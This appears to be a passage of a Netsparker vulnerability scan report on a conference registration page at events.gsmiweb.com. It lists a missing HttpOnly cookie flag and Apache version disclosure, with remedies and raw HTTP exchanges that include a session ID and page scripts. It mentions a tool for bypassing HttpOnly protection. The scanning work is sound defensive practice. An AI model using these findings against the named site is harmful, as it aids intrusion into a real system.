>Blog</a></li><li><a href="http://gsmiweb.com/sponsors.html" title="Sponsors" >Sponsors</a><ul><li><a href="http://gsmiweb.com/sponsors/corporate-sponsors.html" title="Corporate Sponsors" >Corporate Sponsors</a></li><li><a href="http://gsmiweb.com/sponsors/strategic-partners.html" title="Strategic Partners" >Strategic Partners</a></li><li><a href="http://gsmiweb.com/sponsors/media-partners.html" title="Media Partners" >Media Partners</a></li><li><a href="http://gsmiweb.com/sponsors/enterprise-software.html" title="Enterprise Software" >Enterprise Software</a></li><li><a href="http://gsmiweb.com/sponsors/sustainability.html" title="Sustainability" >Sustainability</a></li><li class="last"><a href="http://gsmiweb.com/sponsors/data-centers.html" title="Data Center" >Data Center</a></li></ul></li><li><a href="http://community.gsmiweb.com/" title="GSMI Community" _blank>GSMI Community</a></li><li><a href="http://gsmiweb.com//aboutus.html" title="About Us" >About Us</a><ul><li><a href="/aboutus/leadership-team.html" title="Leadership Team" >Leadership Team</a></li><li class="last"><a href="http://gsmiweb.com/aboutus/gsmi-team.html" title="GSMI Team" >The GSMI Team</a></li></ul></li><li class="last"><a href="http://gsmiweb.com/register.php" title="Register Now" >Register Now</a></li></ul> </div><div id="content"><h1>Register Now</h1><table width="100%" border="0" cellspacing="0" cellpadding="0" align="left"> <tr> <td height="549"> </td> <td valign="top" bgcolor="#FFFFFF"> <img src="/imgs/thumbs/5160413684d9df8af86bac.jpg" border="0" width="175" class="coverthumbs" align="right"/> <p><span class="subheaders"><h3>Cyber Security Summit</h3></span><br> <strong></strong><br><br> <li> Event Location: Washington DC</li> <li> Resort Name: <a href="http://www.kelloggconferencehotel.com/" target="_blank">Kellogg Conference Hotel Gallaudet University</a></li> <li> Event Dates: May 10th - May 12th, 2011</li> <li><a href="http://cybersecuritystrategiessummit.com/ " target="_blank">Event Information</a></li><br/><br/> <form method="post" action="" name="subscription_form" id="subscription_form"> <h1>payment information</h1> <p><em>* indicates mandatory field</em> </p> <table border="0" cellpadding="3" cellspacing="0"> <tr> <td height="28" colspan="6" class="missing"></td> </tr> <tr> <td width="98" height="28" class="content">First Name*</td> <td width="180"><input name="contact_fname" type="text" class="formside2" id="contact_fname" value=""></td> <td class="content">Last Name*</td> <td colspan="3" valign="top"><input name="contact_lname" class="formside2" type="text" id="contact_lname" value=""> </tr> <tr> <td class="content">Title*</td> <td colspan="3" valign="top"> <input name="title" type="text" id="title" class="formside2" value=""> <input type="hidden" name="event" id="event" value="Cyber Security Summit" class="formside2"> <input type="hid..
Cookie Not Marked As HttpOnly
Cookie Not Marked As HttpOnly
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..
Impact
During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.
Actions to Take
See the remedy for solution
Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.
Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as
XSS Tunnel to bypass HTTPOnly protection.
External References
PHPSESSID
Request
GET /subscribe.php?event_id=82 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: events.gsmiweb.com Accept-Encoding: gzip, deflate Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Thu, 28 Apr 2011 13:52:02 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=f6q3nruen2uq30q516cepkjdf7; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Transfer-Encoding: chunked Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><link rel="stylesheet" href="css/default.advanced.css" type="text/css" media="screen" /><link rel="stylesheet" href="css/addoncss.css" type="text/css" media="screen" /><link rel="stylesheet" href="css/dropdown.css" type="text/css" media="screen" /><link rel="stylesheet" href="css/form.css" type="text/css" media="screen" /><link rel="stylesheet" href="css/gsmi_events.css" type="text/css" media="screen" /><title>Global Strategic Management Institute (GSMI) - Performance Management, Balanced Scorecard Training, Performance Management Conferences, Performance Management Training</title><META name="description" content="The Global Strategic Management Institute (GSMI) is the nation's premier provider of Performance Management education through business conferences, business event and business training.. We enable executive decision makers to better measure, manage and implement strategies to improve individual and organizational performance using tools like the Balanced Scorecard. GSMI research centers include: Leadership, Finance, Human Resources (HR) Business Analytics, Budgeting and Forecasting and Performance Management"><META name="keywords" content="gsmi, performance management, balanced scorecard, business conferences ,business events, business training, finance, leadership, process improvement, hr management, human resources, corporate performance management, business performance management, business analytics, corporate strategy, business strategy, organizational effectiveness, performance appraisals, human capital planning, operational performance"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><script src="includes/common.js"></script><script src="includes/ajaxgold.js"></script><script src="includes/number_format.js"></script><script language="JavaScript" src="https://secure.comodo.net/trustlogo/javascript/trustlogo.js" type="text/javascript"></script><script language="javascript">function calculate(){ var eventid=82; sncount = document.getElementById('sncount').value; var wcheckstatus='no'; var amt = 0; amount = 0; priamount = 0; woramount = 0; confamt = 0; priceid = 0; var workshop_alphabet = ''; priceworkshopid = ''; workshop_alphabet = ''; object = ''; disamount = ''; //for getting conference value if(isNaN(document.subscription_form.conferenceval.length)) { var brokenconf = (document.subscription_form.conferenceval.value).split(","); confamt = parseInt(brokenconf[0]); priamount = parseInt(priamount) + parseInt(confamt); priceid = brokenconf[1]; } else if(getRadioValue(document.subscription_form.conferenceval)) { var brokenconf = getRadioValue(document.subscription_form.conferenceval).split(","); confamt = parseInt(brokenconf[0]); priamount = parseInt(priamount) + parseInt(confamt); priceid = brokenconf[1]; } //for enabling and disabling the checkbox and option button var myarr = document.getElementsByName("workshop0"); var myarrofradio1 = document.getElementsByName("workshop1"); var myarrofradio2 = document.getElementsByName("workshop2"); var myarrofradio3 = document.getElementsByName("workshop3"); if (document.getElementById('wcheck')) { for(j=0;j<myarr.length;j++) { if(myarr[j].checked==true) { wcheckstatus='workshop0'; } } } if (document.getElementById('wradio')) { for(j=0;j<myarrofradio1.length;j++) { if(myarrofradio1[j].checked==true) { wcheckstatus='workshop'; } } for(j=0;j<myarrofradio2.length;j++) { if(myarrofradio2[j].checked==true) { wcheckstatus='workshop'; } } for(j=0;j<myarrofradio3.length;j++) { if(myarrofradio3[j].checked==true) { wcheckstatus='workshop'; } } } for(k=0; k<document.subscription_form.elements.length; k++) { if(wcheckstatus=='workshop0') { if(document.subscription_form.elements[k].id=="wradio") { document.subscription_form.elements[k].disabled=true; document.subscription_form.elements[k].checked=false; } } else if(wcheckstatus=='workshop') { if(document.subscription_form.elements[k].id=="wcheck") { document.subscription_form.elements[k].disabled=true; } } else { } } //for getting workshop value for(var i=0; i<sncount; i++) { object = eval("document.subscription_form.sessions" + i); //for checkbox in workshop if(i == 0) { if (document.getElementById('wcheck')) { for(var j=0; j<myarr.length; j++) { if(myarr[j].checked==true) { var chkbroken=myarr[j].value; var chkbrokenval = chkbroken.split(","); var chkamt = parseInt(chkbrokenval[0]); woramount = parseInt(woramount) + parseInt(chkamt); var chkid = chkbrokenval[1]; var chkalphabet = chkbrokenval[2]; workshop_alphabet = workshop_alphabet.concat(chkalphabet,';'); var sesname='workshopsession'+i; var sam=document.getElementById(sesname).value; priceworkshopid = priceworkshopid.concat(sam,';'); } } } } //for radio buttons in workshop else { var wshopname = "workshop"+i; var obje = document.getElementsByName(wshopname); if (obje) { var brokenstring = getRadioValue(obje).split(','); amt = parseInt(brokenstring[0]); if (!isNaN(amt)) { woramount = parseInt(woramount) + parseInt(amt); var sesname='workshopsession'+i; var sam=document.getElementById(sesname).value; priceworkshopid = priceworkshopid.concat(sam,';'); } var wid = parseInt(brokenstring[1]); var walphabet = brokenstring[2]; if (walphabet) { workshop_alphabet = workshop_alphabet.concat(walphabet,';'); } } } } priamount = number_format(priamount,2,'.',''); woramount = number_format(woramount,2,'.',''); amount = parseInt(priamount) + parseInt(woramount); $('amount').value = $('total').value = number_format(amount,2,'.',''); document.getElementById('priceworkshopid').value=priceworkshopid; document.getElementById('workshop_alphabet').value=workshop_alphabet; document.getElementById('workshop').value=woramount; document.getElementById('conference').value=parseInt(priamount); document.getElementById('priceconfid').value=priceid; postDataReturnText('apply-packagediscount.php','eventid='+eventid+'&total=' + $('total').value+'&priceid='+priceworkshopid,applypackageDiscount); }//for applying discounts automatically when the workshops are selectedfunction applypackageDiscount(text){ block($('package_msg')); arr = text.split('|'); if (!isNaN(arr[1])) { if(arr[2]!='') { $('package_msg').innerHTML = '<img src="images/accept.png" align="absmiddle" />'+arr[0]; document.getElementById('pakdis').value=arr[3]; } else { $('package_msg').innerHTML = ''; document.getElementById('pakdis').value=''; } $('amount').value = arr[1]; $('total').value = arr[1]; } postDataReturnText('apply-discount.php','coupon=' + $('coupon').value +'&total=' + $('total').value,applyDiscount);}//for applying the discount by entering its discount couponfunction applyDiscount(text){ var a_balance = 0; if($('avail_balance').value!='') a_balance = $('avail_balance').value; arr = text.split('|'); if (!isNaN(arr[0])) { if(arr[0]==0) { document.getElementById("cc").style.display='none'; } $('amount').value = arr[0]; $('coupon_msg').innerHTML = '<img src="images/accept.png" align="absmiddle" />'; document.getElementById('discountamount').value=arr[1]; document.getElementById('balance_after_ct').value=arr[2]; document.getElementById('discountcode').value=arr[4]; document.getElementById('coupon_amount').value=arr[3]; } else { $('coupon_msg').innerHTML = '<img src="images/cross.png" align="absmiddle" /> '+ arr[0]; $('coupon').value = ''; $('amount').value = arr[1]; }}function resetradiobutton(){for(k=0; k<document.subscription_form.elements.length; k++) { if(document.subscription_form.elements[k].id=="wradio" || document.subscription_form.elements[k].id=="wcheck" || document.subscription_form.elements[k].id=="conferenceval") { if(document.subscription_form.elements[k].disabled==true) document.subscription_form.elements[k].disabled=false; if(document.subscription_form.elements[k].checked==true) document.subscription_form.elements[k].checked=false; } } $('amount').value = $('total').value = ''; document.getElementById('priceconfid').value=''; document.getElementById('conference').value=''; document.getElementById('priceworkshopid').value=''; document.getElementById('workshop_alphabet').value=''; document.getElementById('workshop').value=''; $('coupon_msg').innerHTML=''; $('coupon').value = ''; $('package_msg').innerHTML=''; document.getElementById('pakdis').value=''; }function createinputbox(selectObject){ var ind = selectObject.options[selectObject.selectedIndex].value; if(ind=="Other") document.getElementById('sourceinput').innerHTML='<input type="text" id="other" name="other">'; else document.getElementById('sourceinput').innerHTML='';} </script><style type="text/css">#brighton_sub-menu{display:block;position:static;z-index:999;line-height:0;}#brighton_sub-menu ul{display:block;list-style-type:none;margin:0;padding:0;float:none;position:static;}#brighton_sub-menu ul li{display:block;margin:0;padding:0;font-size:12px;width:100%;position:static;line-height:16px;}#brighton_sub-menu ul li a{display:block;text-decoration:none;width:100%;}#brighton_sub-menu ul li a:hover{cursor:pointer;background:#f1f1f1;}#brighton_sub-menu ul li a span{display:block;padding:7px 15px 7px 14px;line-height:17px;}#brighton_sub-menu ul li.selectedtab{background:#f1f1f1;}#brighton_sub-menu ul li.selectedtab a{font-weight:bold;}#brighton_sub-menu ul li.first a span{}#brighton_sub-menu ul li.last{margin-bottom:25px;}#brighton_sub-menu ul li.separator{display:none;}#brighton_sub-menu ul li.haschildren{margin-bottom:0;}#brighton_sub-menu ul li.haschildren a span{}#brighton_sub-menu ul li.childitem1{background:#f1f1f1;margin-bottom:0;}#brighton_sub-menu ul li.childitem1 a span{margin-left:15px;}#brighton_sub-menu ul li.childitem1.last{padding-bottom:10px;}#brighton_sub-menu ul li.selectedpath{font-weight:normal;}/* fix to negate radmenu inherited style */#brighton_sub-menu div.radmenu{float:none;position:static;white-space:wrap;}#brighton_sub-menu div.radmenu ul.horizontal,#brighton_sub-menu div.radmenu ul.vertical{position:static;}#brighton_content div.radmenu ul.rootGroup{position:static;}#brighton_content div.radmenu ul.vertical{position:static;}.radmenu ul.horizontal,.radmenu ul.vertical,.radmenu .item{position:static;}#brighton_sub-menu .radmenu .item{position:static;}#brighton_sub-menu .radmenu .item a{position:static;}#brighton_sub-menu .radmenu .item a span{position:static;white-space:normal;}#brighton_sub-menu div.radmenu{float:none;position:static;white-space:wrap;}#brighton_sub-menu div.radmenu ul.horizontal,#brighton_sub-menu div.radmenu ul.vertical{position:static;}#brighton_content div.radmenu ul.rootGroup{position:static;}#brighton_content div.radmenu ul.vertical{position:static;}.radmenu ul.horizontal,.radmenu ul.vertical,.radmenu .item{position:static;}#brighton_sub-menu .radmenu .item{position:static;}#brighton_sub-menu .radmenu .item a{position:static;}#brighton_sub-menu .radmenu .item a span{position:static;white-space:normal;}#wrapper #left_main .right .eventtitle { font-size: 16px; font-weight: bold; color: #009BD4; text-decoration: underline;}#wrapper #left_main .right .fancy li { list-style-image: url(assets/templates/images/2010_bullet.png);}#wrapper #left_main .right .eventtitle a { font-size: 16px; font-weight: bold; color: #009BD4; text-decoration: underline;}</style><script language="javascript" type="text/javascript">//<![CDATA[var tl_loc0=(window.location.protocol == "https:")? "https://secure.comodo.net/trustlogo/javascript/trustlogo.js" :"http://www.trustlogo.com/trustlogo/javascript/trustlogo.js";document.writeln('<scr' + 'ipt language="JavaScript" src="'+tl_loc0+'" type="text\/javascript">' + '<\/scr' + 'ipt>');//]]></script></head><body> <div id="wrapper"><div id="header"><img src="https://events.gsmiweb.com/images/logo.gif" width="249" height="75" align="left" /><img src="https://events.gsmiweb.com/images/phone.gif" width="250" height="75" align="right" /></div><div id="navigation"><ul class="dropdown dropdown-horizontal"><li><a href="http://gsmiweb.com/" title="Home" Business Management Training>Home</a></li><li><a href="http://events.gsmiweb.com/events.php" title="Events" >Events</a></li><li class="active"><a href="http://gsmiweb.com/training.html" title="Training" >Training</a><ul><li><a href="/training/in-house-training.html" title="In-House Training" >In-House Training</a></li><li><a href="http://gsmiweb.com/training/balancedscorecard.html" title="Balanced Scorecard Training" >Balanced Scorecard Training</a></li><li class="last"><a href="http://gsmiweb.com/training/quality-assurance-masters.html" title="Quality Assurance Masters" >Quality Assurance Masters</a></li></ul></li><li><a href="http://gsmiweb.com/webinars.html" title="Online Webinars" >Webinars</a><ul><li><a href="http://grcwebconference.gsmiweb.com/" title="GRC Webinar" >GRC Webinar</a></li></ul></li><li><a href="http://blog.gsmiweb.com" title="Blog" >Blog</a></li><li><a href="http://gsmiweb.com/sponsors.html" title="Sponsors" >Sponsors</a><ul><li><a href="http://gsmiweb.com/sponsors/corporate-sponsors.html" title="Corporate Sponsors" >Corporate Sponsors</a></li><li><a href="http://gsmiweb.com/sponsors/strategic-partners.html" title="Strategic Partners" >Strategic Partners</a></li><li><a href="http://gsmiweb.com/sponsors/media-partners.html" title="Media Partners" >Media Partners</a></li><li><a href="http://gsmiweb.com/sponsors/enterprise-software.html" title="Enterprise Software" >Enterprise Software</a></li><li><a href="http://gsmiweb.com/sponsors/sustainability.html" title="Sustainability" >Sustainability</a></li><li class="last"><a href="http://gsmiweb.com/sponsors/data-centers.html" title="Data Center" >Data Center</a></li></ul></li><li><a href="http://community.gsmiweb.com/" title="GSMI Community" _blank>GSMI Community</a></li><li><a href="http://gsmiweb.com//aboutus.html" title="About Us" >About Us</a><ul><li><a href="/aboutus/leadership-team.html" title="Leadership Team" >Leadership Team</a></li><li class="last"><a href="http://gsmiweb.com/aboutus/gsmi-team.html" title="GSMI Team" >The GSMI Team</a></li></ul></li><li class="last"><a href="http://gsmiweb.com/register.php" title="Register Now" >Register Now</a></li></ul> </div><div id="content"><h1>Register Now</h1><table width="100%" border="0" cellspacing="0" cellpadding="0" align="left"> <tr> <td height="549"> </td> <td valign="top" bgcolor="#FFFFFF"> <img src="/imgs/thumbs/5160413684d9df8af86bac.jpg" border="0" width="175" class="coverthumbs" align="right"/> <p><span class="subheaders"><h3>Cyber Security Summit</h3></span><br> <strong></strong><br><br> <li> Event Location: Washington DC</li> <li> Resort Name: <a href="http://www.kelloggconferencehotel.com/" target="_blank">Kellogg Conference Hotel Gallaudet University</a></li> <li> Event Dates: May 10th - May 12th, 2011</li> <li><a href="http://cybersecuritystrategiessummit.com/ " target="_blank">Event Information</a></li><br/><br/> <form method="post" action="" name="subscription_form" id="subscription_form"> <h1>payment information</h1> <p><em>* indicates mandatory field</em> </p> <table border="0" cellpadding="3" cellspacing="0"> <tr> <td height="28" colspan="6" class="missing"></td> </tr> <tr> <td width="98" height="28" class="content">First Name*</td> <td width="180"><input name="contact_fname" type="text" class="formside2" id="contact_fname" value=""></td> <td class="content">Last Name*</td> <td colspan="3" valign="top"><input name="contact_lname" class="formside2" type="text" id="contact_lname" value=""> </tr> <tr> <td class="content">Title*</td> <td colspan="3" valign="top"> <input name="title" type="text" id="title" class="formside2" value=""> <input type="hidden" name="event" id="event" value="Cyber Security Summit" class="formside2"> <input type="hid..
Apache Version Disclosure
Apache Version Disclosure
Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.
Impact
An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.
Configure your web server to prevent information leakage from the SERVER
header of its HTTP response.
2.2.3 (CentOS)
Request
POST /subscribe.php?event_id=82 HTTP/1.1 Referer: https://events.gsmiweb.com/subscribe.php?event_id=82 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: events.gsmiweb.com Cookie: PHPSESSID=f6q3nruen2uq30q516cepkjdf7 Content-Length: 673 Accept-Encoding: gzip, deflate accomodations=&address=&avail_balance=&balance_after_ct=&card_num=&cc_type=Mastercard&city=&company=&conference=&conferenceval=895.00%2c356&contact_fname=&contact_lname=&coupon=&coupon_amount=&department=&dietary=&discountamount=0&discountcode=&email=&event=Cyber+Security+Summit&eventid=82&exp_month=1&exp_year=11&fax=&first_name=&last_name=&leed_source=&pakdis=&payment_method=cc&phone=&priceconfid=0&priceworkshopid=&reset=reset&response_code=&sessions0=0&sessions1=1&sessions2=2&sessions3=3&sncount=4&state=&Status=&submit=Submit&title=&total=&workshop=&workshop_alphabet=&workshop1=295.00%2c358%2cA&workshop2=295.00%2c360%2cC&workshopsession1=1&workshopsession2=2&zip=
Response
HTTP/1.1 200 OK Date: Thu, 28 Apr 2011 13:52:03 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Transfer-Encoding: chunked Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><link rel="stylesheet" href="css/default.advanced.css" type="text/css" media="screen" /><link rel="stylesheet" href="css/addoncss.css" type="text/css" media="screen" /><link rel="stylesheet" href="css/dropdown.css" type="text/css" media="screen" /><link rel="stylesheet" href="css/form.css" type="text/css" media="screen" /><link rel="stylesheet" href="css/gsmi_events.css" type="text/css" media="screen" /><title>Global Strategic Management Institute (GSMI) - Performance Management, Balanced Scorecard Training, Performance Management Conferences, Performance Management Training</title><META name="description" content="The Global Strategic Management Institute (GSMI) is the nation's premier provider of Performance Management education through business conferences, business event and business training.. We enable executive decision makers to better measure, manage and implement strategies to improve individual and organizational performance using tools like the Balanced Scorecard. GSMI research centers include: Leadership, Finance, Human Resources (HR) Business Analytics, Budgeting and Forecasting and Performance Management"><META name="keywords" content="gsmi, performance management, balanced scorecard, business conferences ,business events, business training, finance, leadership, process improvement, hr management, human resources, corporate performance management, business performance management, business analytics, corporate strategy, business strategy, organizational effectiveness, performance appraisals, human capital planning, operational performance"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><script src="includes/common.js"></script><script src="includes/ajaxgold.js"></script><script src="includes/number_format.js"></script><script language="JavaScript" src="https://secure.comodo.net/trustlogo/javascript/trustlogo.js" type="text/javascript"></script><script language="javascript">function calculate(){ var eventid=82; sncount = document.getElementById('sncount').value; var wcheckstatus='no'; var amt = 0; amount = 0; priamount = 0; woramount = 0; confamt = 0; priceid = 0; var workshop_alphabet = ''; priceworkshopid = ''; workshop_alphabet = ''; object = ''; disamount = ''; //for getting conference value if(isNaN(document.subscription_form.conferenceval.length)) { var brokenconf = (document.subscription_form.conferenceval.value).split(","); confamt = parseInt(brokenconf[0]); priamount = parseInt(priamount) + parseInt(confamt); priceid = brokenconf[1]; } else if(getRadioValue(document.subscription_form.conferenceval)) { var brokenconf = getRadioValue(document.subscription_form.conferenceval).split(","); confamt = parseInt(brokenconf[0]); priamount = parseInt(priamount) + parseInt(confamt); priceid = brokenconf[1]; } //for enabling and disabling the checkbox and option button var myarr = document.getElementsByName("workshop0"); var myarrofradio1 = document.getElementsByName("workshop1"); var myarrofradio2 = document.getElementsByName("workshop2"); var myarrofradio3 = document.getElementsByName("workshop3"); if (document.getElementById('wcheck')) { for(j=0;j<myarr.length;j++) { if(myarr[j].checked==true) { wcheckstatus='workshop0'; } } } if (document.getElementById('wradio')) { for(j=0;j<myarrofradio1.length;j++) { if(myarrofradio1[j].checked==true) { wcheckstatus='workshop'; } } for(j=0;j<myarrofradio2.length;j++) { if(myarrofradio2[j].checked==true) { wcheckstatus='workshop'; } } for(j=0;j<myarrofradio3.length;j++) { if(myarrofradio3[j].checked==true) { wcheckstatus='workshop'; } } } for(k=0; k<document.subscription_form.elements.length; k++) { if(wcheckstatus=='workshop0') { if(document.subscription_form.elements[k].id=="wradio") { document.subscription_form.elements[k].disabled=true; document.subscription_form.elements[k].checked=false; } } else if(wcheckstatus=='workshop') { if(document.subscription_form.elements[k].id=="wcheck") { document.subscription_form.elements[k].disabled=true; } } else { } } //for getting workshop value for(var i=0; i<sncount; i++) { object = eval("document.subscription_form.sessions" + i); //for checkbox in workshop if(i == 0) { if (document.getElementById('wcheck')) { for(var j=0; j<myarr.length; j++) { if(myarr[j].checked==true) { var chkbroken=myarr[j].value; var chkbrokenval = chkbroken.split(","); var chkamt = parseInt(chkbrokenval[0]); woramount = parseInt(woramount) + parseInt(chkamt); var chkid = chkbrokenval[1]; var chkalphabet = chkbrokenval[2]; workshop_alphabet = workshop_alphabet.concat(chkalphabet,';'); var sesname='workshopsession'+i; var sam=document.getElementById(sesname).value; priceworkshopid = priceworkshopid.concat(sam,';'); } } } } //for radio buttons in workshop else { var wshopname = "workshop"+i; var obje = document.getElementsByName(wshopname); if (obje) { var brokenstring = getRadioValue(obje).split(','); amt = parseInt(brokenstring[0]); if (!isNaN(amt)) { woramount = parseInt(woramount) + parseInt(amt); var sesname='workshopsession'+i; var sam=document.getElementById(sesname).value; priceworkshopid = priceworkshopid.concat(sam,';'); } var wid = parseInt(brokenstring[1]); var walphabet = brokenstring[2]; if (walphabet) { workshop_alphabet = workshop_alphabet.concat(walphabet,';'); } } } } priamount = number_format(priamount,2,'.',''); woramount = number_format(woramount,2,'.',''); amount = parseInt(priamount) + parseInt(woramount); $('amount').value = $('total').value = number_format(amount,2,'.',''); document.getElementById('priceworkshopid').value=priceworkshopid; document.getElementById('workshop_alphabet').value=workshop_alphabet; document.getElementById('workshop').value=woramount; document.getElementById('conference').value=parseInt(priamount); document.getElementById('priceconfid').value=priceid; postDataReturnText('apply-packagediscount.php','eventid='+eventid+'&total=' + $('total').value+'&priceid='+priceworkshopid,applypackageDiscount); }//for applying discounts automatically when the workshops are selectedfunction applypackageDiscount(text){ block($('package_msg')); arr = text.split('|'); if (!isNaN(arr[1])) { if(arr[2]!='') { $('package_msg').innerHTML = '<img src="images/accept.png" align="absmiddle" />'+arr[0]; document.getElementById('pakdis').value=arr[3]; } else { $('package_msg').innerHTML = ''; document.getElementById('pakdis').value=''; } $('amount').value = arr[1]; $('total').value = arr[1]; } postDataReturnText('apply-discount.php','coupon=' + $('coupon').value +'&total=' + $('total').value,applyDiscount);}//for applying the discount by entering its discount couponfunction applyDiscount(text){ var a_balance = 0; if($('avail_balance').value!='') a_balance = $('avail_balance').value; arr = text.split('|'); if (!isNaN(arr[0])) { if(arr[0]==0) { document.getElementById("cc").style.display='none'; } $('amount').value = arr[0]; $('coupon_msg').innerHTML = '<img src="images/accept.png" align="absmiddle" />'; document.getElementById('discountamount').value=arr[1]; document.getElementById('balance_after_ct').value=arr[2]; document.getElementById('discountcode').value=arr[4]; document.getElementById('coupon_amount').value=arr[3]; } else { $('coupon_msg').innerHTML = '<img src="images/cross.png" align="absmiddle" /> '+ arr[0]; $('coupon').value = ''; $('amount').value = arr[1]; }}function resetradiobutton(){for(k=0; k<document.subscription_form.elements.length; k++) { if(document.subscription_form.elements[k].id=="wradio" || document.subscription_form.elements[k].id=="wcheck" || document.subscription_form.elements[k].id=="conferenceval") { if(document.subscription_form.elements[k].disabled==true) document.subscription_form.elements[k].disabled=false; if(document.subscription_form.elements[k].checked==true) document.subscription_form.elements[k].checked=false; } } $('amount').value = $('total').value = ''; document.getElementById('priceconfid').value=''; document.getElementById('conference').value=''; document.getElementById('priceworkshopid').value=''; document.getElementById('workshop_alphabet').value=''; document.getElementById('workshop').value=''; $('coupon_msg').innerHTML=''; $('coupon').value = ''; $('package_msg').innerHTML=''; document.getElementById('pakdis').value=''; }function createinputbox(selectObject){ var ind = selectObject.options[selectObject.selectedIndex].value; if(ind=="Other") document.getElementById('sourceinput').innerHTML='<input type="text" id="other" name="other">'; else document.getElementById('sourceinput').innerHTML='';} </script><style type="text/css">#brighton_sub-menu{display:block;position:static;z-index:999;line-height:0;}#brighton_sub-menu ul{display:block;list-style-type:none;margin:0;padding:0;float:none;position:static;}#brighton_sub-menu ul li{display:block;margin:0;padding:0;font-size:12px;width:100%;position:static;line-height:16px;}#brighton_sub-menu ul li a{display:block;text-decoration:none;width:100%;}#brighton_sub-menu ul li a:hover{cursor:pointer;background:#f1f1f1;}#brighton_sub-menu ul li a span{display:block;padding:7px 15px 7px 14px;line-height:17px;}#brighton_sub-menu ul li.selectedtab{background:#f1f1f1;}#brighton_sub-menu ul li.selectedtab a{font-weight:bold;}#brighton_sub-menu ul li.first a span{}#brighton_sub-menu ul li.last{margin-bottom:25px;}#brighton_sub-menu ul li.separator{display:none;}#brighton_sub-menu ul li.haschildren{margin-bottom:0;}#brighton_sub-menu ul li.haschildren a span{}#brighton_sub-menu ul li.childitem1{background:#f1f1f1;margin-bottom:0;}#brighton_sub-menu ul li.childitem1 a span{margin-left:15px;}#brighton_sub-menu ul li.childitem1.last{padding-bottom:10px;}#brighton_sub-menu ul li.selectedpath{font-weight:normal;}/* fix to negate radmenu inherited style */#brighton_sub-menu div.radmenu{float:none;position:static;white-space:wrap;}#brighton_sub-menu div.radmenu ul.horizontal,#brighton_sub-menu div.radmenu ul.vertical{position:static;}#brighton_content div.radmenu ul.rootGroup{position:static;}#brighton_content div.radmenu ul.vertical{position:static;}.radmenu ul.horizontal,.radmenu ul.vertical,.radmenu .item{position:static;}#brighton_sub-menu .radmenu .item{position:static;}#brighton_sub-menu .radmenu .item a{position:static;}#brighton_sub-menu .radmenu .item a span{position:static;white-space:normal;}#brighton_sub-menu div.radmenu{float:none;position:static;white-space:wrap;}#brighton_sub-menu div.radmenu ul.horizontal,#brighton_sub-menu div.radmenu ul.vertical{position:static;}#brighton_content div.radmenu ul.rootGroup{position:static;}#brighton_content div.radmenu ul.vertical{position:static;}.radmenu ul.horizontal,.radmenu ul.vertical,.radmenu .item{position:static;}#brighton_sub-menu .radmenu .item{position:static;}#brighton_sub-menu .radmenu .item a{position:static;}#brighton_sub-menu .radmenu .item a span{position:static;white-space:normal;}#wrapper #left_main .right .eventtitle { font-size: 16px; font-weight: bold; color: #009BD4; text-decoration: underline;}#wrapper #left_main .right .fancy li { list-style-image: url(assets/templates/images/2010_bullet.png);}#wrapper #left_main .right .eventtitle a { font-size: 16px; font-weight: bold; color: #009BD4; text-decoration: underline;}</style><script language="javascript" type="text/javascript">//<![CDATA[var tl_loc0=(window.location.protocol == "https:")? "https://secure.comodo.net/trustlogo/javascript/trustlogo.js" :"http://www.trustlogo.com/trustlogo/javascript/trustlogo.js";document.writeln('<scr' + 'ipt language="JavaScript" src="'+tl_loc0+'" type="text\/javascript">' + '<\/scr' + 'ipt>');//]]></script></head><body> <div id="wrapper"><div id="header"><img src="https://events.gsmiweb.com/images/logo.gif" width="249" height="75" align="left" /><img src="https://events.gsmiweb.com/images/phone.gif" width="250" height="75" align="right" /></div><div id="navigation"><ul class="dropdown dropdown-horizontal"><li><a href="http://gsmiweb.com/" title="Home" Business Management Training>Home</a></li><li><a href="http://events.gsmiweb.com/events.php" title="Events" >Events</a></li><li class="active"><a href="http://gsmiweb.com/training.html" title="Training" >Training</a><ul><li><a href="/training/in-house-training.html" title="In-House Training" >In-House Training</a></li><li><a href="http://gsmiweb.com/training/balancedscorecard.html" title="Balanced Scorecard Training" >Balanced Scorecard Training</a></li><li class="last"><a href="http://gsmiweb.com/training/quality-assurance-masters.html" title="Quality Assurance Masters" >Quality Assurance Masters</a></li></ul></li><li><a href="http://gsmiweb.com/webinars.html" title="Online Webinars" >Webinars</a><ul><li><a href="http://grcwebconference.gsmiweb.com/" title="GRC Webinar" >GRC Webinar</a></li></ul></li><li><a href="http://blog.gsmiweb.com" title="Blog" >Blog</a></li><li><a href="http://gsmiweb.com/sponsors.html" title="Sponsors" >Sponsors</a><ul><li><a href="http://gsmiweb.com/sponsors/corporate-sponsors.html" title="Corporate 